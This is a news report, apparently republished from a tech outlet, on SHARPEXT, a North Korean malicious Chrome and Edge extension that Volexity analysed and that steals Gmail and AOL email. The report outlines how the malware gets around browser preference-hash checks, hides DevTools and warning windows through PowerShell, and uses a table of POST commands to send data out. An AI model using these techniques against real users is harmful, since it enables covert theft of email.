SHARPEXT has slurped up thousands of emails in the past year and keeps getting better.


Getty Images

Researchers have unearthed never-before-seen malware that hackers from North Korea have been using to surreptitiously read and download email and attachments from infected users’ Gmail and AOL accounts.

The malware, dubbed SHARPEXT by researchers from security firm Volexity, uses clever means to install a browser extension for the Chrome and Edge browsers, Volexity reported in a blog post. The extension can’t be detected by the email services, and since the browser has already been authenticated using any multifactor authentication protections in place, this increasingly popular security measure plays no role in reining in the account compromise.

Further Reading

North Korean hackers stole nearly $400 million in crypto last yearThe malware has been in use for “well over a year,” Volexity said, and is the work of a hacking group the company tracks as SharpTongue. The group is sponsored by North Korea’s government and overlaps with a group tracked as Kimsuky by other researchers. SHARPEXT is targeting organizations in the US, Europe, and South Korea that work on nuclear weapons and other issues North Korea deems important to its national security.

Volexity President Steven Adair said in an email that the extension gets installed “by way of spear phishing and social engineering where the victim is fooled into opening a malicious document. Previously we have seen DPRK threat actors launch spear phishing attacks where the entire objective was to get the victim to install a browser extension vs it being a post exploitation mechanism for persistence and data theft.” In its current incarnation, the malware works only on Windows, but Adair said there’s no reason it couldn’t be broadened to infect browsers running on macOS or Linux, too.

The blog post added: “Volexity’s own visibility shows the extension has been quite successful, as logs obtained by Volexity show the attacker was able to successfully steal thousands of emails from multiple victims through the malware’s deployment.”

Installing a browser extension during a phishing operation without the end-user noticing isn’t easy. SHARPEXT developers have clearly paid attention to research like what’s published here, here, and here, which shows how a security mechanism in the Chromium browser engine prevents malware from making changes to sensitive user settings. Each time a legitimate change is made, the browser takes a cryptographic hash of some of the code. At startup, the browser verifies the hashes, and if any of them don’t match, the browser requests the old settings be restored.



For attackers to work around this protection, they must first extract the following from the computer they’re compromising:

  • A copy of the resources.pak file from the browser (which contains the HMAC seed used by Chrome)
  • The user’s S-ID value
  • The original Preferences and Secure Preferences files from the user’s system

After modifying the preference files, SHARPEXT automatically loads the extension and executes a PowerShell script that enables DevTools, a setting that allows the browser to run customized code and settings.

“The script runs in an infinite loop checking for processes associated with the targeted browsers,” Volexity explained. “If any targeted browsers are found running, the script checks the title of the tab for a specific keyword (for example’ 05101190,’ or ‘Tab+’ depending on the SHARPEXT version). The specific keyword is inserted into the title by the malicious extension when an active tab changes or when a page is loaded.”



The post continued:

The keystrokes sent are equivalent to Control+Shift+J, the shortcut to enable the DevTools panel. Lastly, the PowerShell script hides the newly opened DevTools window by using the ShowWindow() API and the SW_HIDE flag. At the end of this process, DevTools is enabled on the active tab, but the window is hidden.

In addition, this script is used to hide any windows that could alert the victim. Microsoft Edge, for example, periodically displays a warning message to the user (Figure 5) if extensions are running in developer mode. The script constantly checks if this window appears and hides it by using the ShowWindow() and the SW_HIDE flag.



Once installed, the extension can perform the following requests:

HTTP POST Data Description
mode=list List previously collected email from the victim to ensure duplicates are not uploaded. This list is continuously updated as SHARPEXT executes.
mode=domain List email domains with which the victim has previously communicated. This list is continuously updated as SHARPEXT executes.
mode=black Collect a blacklist of email senders that should be ignored when collecting email from the victim.
mode=newD&d=[data] Add a domain to the list of all domains viewed by the victim.
mode=attach&name=[data]&idx=[data]&body=[data] Upload a new attachment to the remote server.
mode=new&mid=[data]&mbody=[data] Upload Gmail data to the remote server.
mode=attlist Commented by the attacker; receive an attachments list to be exfiltrated.
mode=new_aol&mid=[data]&mbody=[data] Upload AOL data to the remote server.

SHARPEXT allows the hackers to create lists of email addresses to ignore and to keep track of email or attachments that have already been stolen.

Volexity created the following summary of the orchestration of the various SHARPEXT components it analyzed:



The blog post provides images, file names, and other indicators that trained people can use to determine if they have been targeted or infected by this malware. The company warned that the threat it poses has grown over time and isn’t likely to go away anytime soon.

“When Volexity first encountered SHARPEXT, it seemed to be a tool in early development containing numerous bugs, an indication the tool was immature,” the company said. “The latest updates and ongoing maintenance demonstrate the attacker is achieving its goals, finding value in continuing to refine it.”


How To Change a Volume Label on Windows 11

Windows gives every drive you connect to your computer by default a common name. You can modify the volume labels to make them more illustrative. For NTFS drives, you can give them a unique name up to 32 characters long, or 11 characters long for FAT drives, including spaces. FAT ...

View more: How To Change a Volume Label on Windows 11

Unable to Eject USB Drive on Windows 11? Here’s the Fix!

Data powers everything we do and is undoubtedly one of our most important assets. And when it comes to storing or transferring data on the go, USB sticks are our first choice. Isn’t it? The importance of USB flash drives in our day-to-day lives cannot be neglected. USB drives are ...

View more: Unable to Eject USB Drive on Windows 11? Here’s the Fix!

Microsoft Office for iPad to Support Apple Pencil's Handwriting-to-Text Feature

Microsoft this week released a new beta version of its Office app for iPad with support for the Apple Pencil’s handwriting-to-text feature Scribble. The feature allows you to insert and edit text in a Word document, PowerPoint presentation, or Excel spreadsheet using the Apple Pencil, with handwriting automatically converted into ...

View more: Microsoft Office for iPad to Support Apple Pencil's Handwriting-to-Text Feature

How to Recover Corrupted Excel Files in Windows 10 [14 Tips]

A corrupted Excel file can result in a lot of wasted time and severe data loss. Fortunately, there are ways to fix damaged files even if you did not back up your information aforehand. We know how important it is to be able to act quickly and rely on ...

View more: How to Recover Corrupted Excel Files in Windows 10 [14 Tips]

How to Install and Set Up Visual Studio 2022 on Windows 11/10

Visual Studio 2022 is one of the best text editors in the market. It packs an excellent User Interface, Intellisense, and a lot of different features to make coding easier for you. In this post, we will see how you can install and set up Visual Studio 2022 on Windows ...

View more: How to Install and Set Up Visual Studio 2022 on Windows 11/10

Microsoft Flight Simulator – Milviz Shares Updates on ATR 72/42, Blackbird, Huey, Beaver, Otter, 737-200, & More; T-38C Talon Teased; GSX & Karachi Airport Get New Video & Screenshots

Today third-party developers have provided new information and reveals about upcoming add-ons for Microsoft Flight Simulator. Milviz has hosted a livestream with plenty of updates about its products. The ATR project is progressing apace and will “absolutely be study-level.” It’ll feature icing, wear and tear, windshield wipers, some failures, and ...

View more: Microsoft Flight Simulator – Milviz Shares Updates on ATR 72/42, Blackbird, Huey, Beaver, Otter, 737-200, & More; T-38C Talon Teased; GSX & Karachi Airport Get New Video & Screenshots

How to Enlarge a Virtual Machine’s Disk in VirtualBox or VMware

Tenaht/ When you create a virtual hard disk in VirtualBox or VMware, you specify a maximum disk size. If you want more space on your virtual machine’s hard disk later, you’ll have to enlarge the virtual hard disk and partition. Note that you may want to back up your ...

View more: How to Enlarge a Virtual Machine’s Disk in VirtualBox or VMware

Review Fobia – St. Dinfna Hotel

Playing a horror game can be a thrilling and disturbing experience. However, many rely on cheap jump scares and dated tropes. Consequently, they can be tiresome, repetitive, and often aren’t as scary as intended. As such, when Fobia – St. Dinfna Hotel landed on my desk, I was a ...

View more: Review Fobia – St. Dinfna Hotel

Fix No sound in Microsoft Edge

How To Download and Install BlueStacks on Windows 11 PC

How to Uninstall League of Legends on PC

Sony Thinks Call of Duty Can Make or Break PlayStation’s Success. They Are Wrong.

VLC Media Player Is Now Banned, But It Still Working For All

Microsoft Teams Recording is Missing [Solution]

How to Turn Scroll Lock Off (or On) in Microsoft Excel

How to Remove Icons From the Windows Desktop

How to Use Message Reaction on WhatsApp for Desktop

Lei Jun was not interested in Tencent QQ, but tried to buy NetEase

Unistack Service Group (unistacksvcgroup) High Disk or CPU usage

6 Ways to Check Hard Disk Health in Windows


Top Car News Car News